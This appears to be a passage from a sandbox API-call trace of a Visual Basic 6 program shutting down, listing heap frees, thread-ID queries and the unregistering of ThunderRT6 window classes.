[0133.728] GetCurrentThreadId () returned 0xf38 [0133.728] GetCurrentThreadId () returned 0xf38 [0133.729] GetCurrentThreadId () returned 0xf38 [0133.729] GetCurrentThreadId () returned 0xf38 [0133.729] GetCurrentThreadId () returned 0xf38 [0133.729] PostMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0133.731] GetCurrentThreadId () returned 0xf38 [0133.731] GetCurrentThreadId () returned 0xf38 [0133.731] GetCurrentThreadId () returned 0xf38 [0133.731] GetCurrentThreadId () returned 0xf38 [0133.731] GetCurrentThreadId () returned 0xf38 [0133.731] GetCurrentThreadId () returned 0xf38 [0133.731] GetCurrentThreadId () returned 0xf38 [0133.731] GetCurrentThreadId () returned 0xf38 [0133.732] GetCurrentThreadId () returned 0xf38 [0133.732] GetCurrentThreadId () returned 0xf38 [0133.732] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102ad8 | out: hHeap=0x30f0000) returned 1 [0133.732] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcc0 | out: hHeap=0x30f0000) returned 1 [0133.732] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102af8 | out: hHeap=0x30f0000) returned 1 [0133.732] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102b18 | out: hHeap=0x30f0000) returned 1 [0133.732] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bbb8 | out: hHeap=0x30f0000) returned 1 [0133.732] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3108530 | out: hHeap=0x30f0000) returned 1 [0133.733] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3107c40 | out: hHeap=0x30f0000) returned 1 [0133.733] GetCurrentThreadId () returned 0xf38 [0133.733] GetCurrentThreadId () returned 0xf38 [0133.733] GetCurrentThreadId () returned 0xf38 [0133.733] GetCurrentThreadId () returned 0xf38 [0133.734] GetCurrentThreadId () returned 0xf38 [0133.734] GetCurrentThreadId () returned 0xf38 [0133.734] PostMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0133.735] GetCurrentThreadId () returned 0xf38 [0133.736] GetCurrentThreadId () returned 0xf38 [0133.736] GetCurrentThreadId () returned 0xf38 [0133.738] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3107be0 | out: hHeap=0x30f0000) returned 1 [0133.738] IMalloc:Free (This=0x76da66bc, pv=0xe4a498) [0133.738] IMalloc:Free (This=0x76da66bc, pv=0xe4a470) [0133.738] IMalloc:Free (This=0x76da66bc, pv=0xe49e28) [0133.738] IMalloc:Free (This=0x76da66bc, pv=0xe3ec68) [0133.739] IMalloc:Free (This=0x76da66bc, pv=0xe3a860) [0133.739] IMalloc:Free (This=0x76da66bc, pv=0xe42668) [0133.739] IMalloc:Free (This=0x76da66bc, pv=0xe3f820) [0133.813] IMalloc:Free (This=0x76da66bc, pv=0xe3e7f0) [0133.814] IMalloc:Free (This=0x76da66bc, pv=0xe3efe8) [0133.814] GetCurrentThreadId () returned 0xf38 [0133.814] GetCurrentThreadId () returned 0xf38 [0133.814] GetCurrentThreadId () returned 0xf38 [0133.814] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101570 | out: hHeap=0x30f0000) returned 1 [0133.814] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101540 | out: hHeap=0x30f0000) returned 1 [0133.814] GetCurrentThreadId () returned 0xf38 [0133.814] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101cc0 | out: hHeap=0x30f0000) returned 1 [0133.815] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310abb8 | out: hHeap=0x30f0000) returned 1 [0133.815] GetCurrentThreadId () returned 0xf38 [0133.815] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4780 | out: hHeap=0x30f0000) returned 1 [0133.815] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101468 | out: hHeap=0x30f0000) returned 1 [0133.815] GetCurrentThreadId () returned 0xf38 [0133.815] GetCurrentThreadId () returned 0xf38 [0133.815] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2270 | out: hHeap=0x30f0000) returned 1 [0133.815] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2208 | out: hHeap=0x30f0000) returned 1 [0133.815] GetCurrentThreadId () returned 0xf38 [0133.815] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028f8 | out: hHeap=0x30f0000) returned 1 [0133.815] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102a98 | out: hHeap=0x30f0000) returned 1 [0133.815] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102a58 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102a18 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102918 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102998 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102958 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31029d8 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31028d8 | out: hHeap=0x30f0000) returned 1 [0133.816] SetEvent (hEvent=0x138) returned 1 [0133.816] CloseHandle (hObject=0x138) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310ad00 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31013c0 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x3cd0000, dwFlags=0x0, lpMem=0x3cd08f0 | out: hHeap=0x3cd0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101498 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x3cd0000, dwFlags=0x0, lpMem=0x3cd0928 | out: hHeap=0x3cd0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2cc0 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2e38 | out: hHeap=0x30f0000) returned 1 [0133.816] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2ea8 | out: hHeap=0x30f0000) returned 1 [0133.817] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2ca8 | out: hHeap=0x30f0000) returned 1 [0133.817] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f2b88 | out: hHeap=0x30f0000) returned 1 [0133.817] lstrlenA (lpString="ThunderRT6") returned 10 [0133.817] lstrcpyA (in: lpString1=0x28fd58, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0133.817] UnregisterClassA (lpClassName="ThunderRT6TextBox", hInstance=0x72940000) returned 1 [0133.980] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3370 | out: hHeap=0x30f0000) returned 1 [0133.980] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3498 | out: hHeap=0x30f0000) returned 1 [0133.980] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3330 | out: hHeap=0x30f0000) returned 1 [0133.980] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3500 | out: hHeap=0x30f0000) returned 1 [0133.981] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3318 | out: hHeap=0x30f0000) returned 1 [0133.981] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f31f8 | out: hHeap=0x30f0000) returned 1 [0133.981] lstrlenA (lpString="ThunderRT6") returned 10 [0133.981] lstrcpyA (in: lpString1=0x28fd58, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0133.981] UnregisterClassA (lpClassName="ThunderRT6CommandButton", hInstance=0x72940000) returned 1 [0133.981] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f38e8 | out: hHeap=0x30f0000) returned 1 [0133.981] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f39c8 | out: hHeap=0x30f0000) returned 1 [0133.981] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f38b8 | out: hHeap=0x30f0000) returned 1 [0133.981] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3a18 | out: hHeap=0x30f0000) returned 1 [0133.982] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3898 | out: hHeap=0x30f0000) returned 1 [0133.982] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3778 | out: hHeap=0x30f0000) returned 1 [0133.982] lstrlenA (lpString="ThunderRT6") returned 10 [0133.982] lstrcpyA (in: lpString1=0x28fd58, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0133.982] UnregisterClassA (lpClassName="ThunderRT6Timer", hInstance=0x72940000) returned 1 [0133.982] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3d58 | out: hHeap=0x30f0000) returned 1 [0133.982] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3d90 | out: hHeap=0x30f0000) returned 1 [0133.982] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3d40 | out: hHeap=0x30f0000) returned 1 [0133.982] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3da0 | out: hHeap=0x30f0000) returned 1 [0133.982] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3d28 | out: hHeap=0x30f0000) returned 1 [0133.983] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3c08 | out: hHeap=0x30f0000) returned 1 [0133.983] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3fa0 | out: hHeap=0x30f0000) returned 1 [0133.983] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3f88 | out: hHeap=0x30f0000) returned 1 [0133.983] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3e68 | out: hHeap=0x30f0000) returned 1 [0133.983] lstrlenA (lpString="ThunderRT6") returned 10 [0133.983] lstrcpyA (in: lpString1=0x28fd58, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0133.983] UnregisterClassA (lpClassName="ThunderRT6Form", hInstance=0x72940000) returned 1 [0133.984] lstrlenA (lpString="ThunderRT6") returned 10 [0133.984] lstrcpyA (in: lpString1=0x28fd58, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0133.984] lstrlenA (lpString="ThunderRT6Form") returned 14 [0133.984] lstrcpynA (in: lpString1=0x28fd66, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0133.984] UnregisterClassA (lpClassName="ThunderRT6FormDC", hInstance=0x72940000) returned 1 [0133.984] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f41d8 | out: hHeap=0x30f0000) returned 1 [0133.984] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4368 | out: hHeap=0x30f0000) returned 1 [0133.984] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f43f0 | out: hHeap=0x30f0000) returned 1 [0133.984] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3107d50 | out: hHeap=0x30f0000) returned 1 [0133.984] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f41c8 | out: hHeap=0x30f0000) returned 1 [0133.985] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f40a8 | out: hHeap=0x30f0000) returned 1 [0133.985] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f48c0 | out: hHeap=0x30f0000) returned 1 [0133.985] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f48f8 | out: hHeap=0x30f0000) returned 1 [0133.985] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f31c8 | out: hHeap=0x30f0000) returned 1 [0133.985] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f47a0 | out: hHeap=0x30f0000) returned 1 [0133.985] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4ae0 | out: hHeap=0x30f0000) returned 1 [0133.985] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4b08 | out: hHeap=0x30f0000) returned 1 [0133.985] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f31e0 | out: hHeap=0x30f0000) returned 1 [0133.986] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f49c0 | out: hHeap=0x30f0000) returned 1 [0133.986] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4cd0 | out: hHeap=0x30f0000) returned 1 [0133.986] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4e60 | out: hHeap=0x30f0000) returned 1 [0133.986] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4ee8 | out: hHeap=0x30f0000) returned 1 [0133.986] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4cb8 | out: hHeap=0x30f0000) returned 1 [0133.986] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4b98 | out: hHeap=0x30f0000) returned 1 [0133.986] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5328 | out: hHeap=0x30f0000) returned 1 [0133.986] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f53b8 | out: hHeap=0x30f0000) returned 1 [0133.986] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f3198 | out: hHeap=0x30f0000) returned 1 [0133.987] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5208 | out: hHeap=0x30f0000) returned 1 [0133.987] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5660 | out: hHeap=0x30f0000) returned 1 [0133.987] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5850 | out: hHeap=0x30f0000) returned 1 [0133.987] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5908 | out: hHeap=0x30f0000) returned 1 [0133.987] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5648 | out: hHeap=0x30f0000) returned 1 [0133.987] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5528 | out: hHeap=0x30f0000) returned 1 [0133.987] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5ed8 | out: hHeap=0x30f0000) returned 1 [0133.988] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f6070 | out: hHeap=0x30f0000) returned 1 [0133.988] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f6100 | out: hHeap=0x30f0000) returned 1 [0133.988] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4710 | out: hHeap=0x30f0000) returned 1 [0133.988] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5db8 | out: hHeap=0x30f0000) returned 1 [0133.988] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f6538 | out: hHeap=0x30f0000) returned 1 [0133.988] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f6708 | out: hHeap=0x30f0000) returned 1 [0133.988] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f67b8 | out: hHeap=0x30f0000) returned 1 [0133.988] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f4748 | out: hHeap=0x30f0000) returned 1 [0133.992] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f6418 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101700 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31017f8 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31016c0 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101848 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31016a8 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101588 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31023b8 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102470 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102388 | out: hHeap=0x30f0000) returned 1 [0133.993] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31024b0 | out: hHeap=0x30f0000) returned 1 [0133.994] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101ba0 | out: hHeap=0x30f0000) returned 1 [0133.994] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101a68 | out: hHeap=0x30f0000) returned 1 [0133.994] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102f90 | out: hHeap=0x30f0000) returned 1 [0133.994] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103088 | out: hHeap=0x30f0000) returned 1 [0133.994] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102f60 | out: hHeap=0x30f0000) returned 1 [0133.994] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31030d8 | out: hHeap=0x30f0000) returned 1 [0133.994] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101bb8 | out: hHeap=0x30f0000) returned 1 [0133.994] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3102e40 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103548 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5ce8 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5cb8 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103628 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101bd0 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103428 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31057f8 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5d40 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3105908 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101be8 | out: hHeap=0x30f0000) returned 1 [0133.995] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103810 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3105b40 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3105c50 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3105cb0 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101c00 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103938 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3105f18 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3105fb0 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3105ee8 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3105fe8 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101c18 | out: hHeap=0x30f0000) returned 1 [0133.996] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103a60 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106168 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106200 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106138 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106230 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101c30 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103b88 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103308 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31033d0 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31032d8 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106520 | out: hHeap=0x30f0000) returned 1 [0133.997] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101c48 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103cb0 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31066f8 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31067c8 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31066c8 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106820 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101c60 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103dd8 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106a08 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106b00 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31069d8 | out: hHeap=0x30f0000) returned 1 [0133.998] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106b60 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101c78 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103f00 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106d60 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5d98 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106da0 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3103418 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3104028 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106e88 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106e60 | out: hHeap=0x30f0000) returned 1 [0133.999] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106ef8 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101c90 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3104150 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3106380 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31027d8 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31063d8 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x30f5da8 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3104278 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31071f0 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31064e0 | out: hHeap=0x30f0000) returned 1 [0134.000] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31064b0 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3107290 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3101ca8 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31043a0 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3107400 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31074e0 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3107528 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31073f0 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31044c8 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3107718 | out: hHeap=0x30f0000) returned 1 [0134.001] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31078a0 | out: hHeap=0x30f0000) returned 1 [0134.002] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31078e8 | out: hHeap=0x30f0000) returned 1 [0134.002] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x3107708 | out: hHeap=0x30f0000) returned 1 [0134.002] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x31045f0 | out: hHeap=0x30f0000) returned 1 [0134.002] 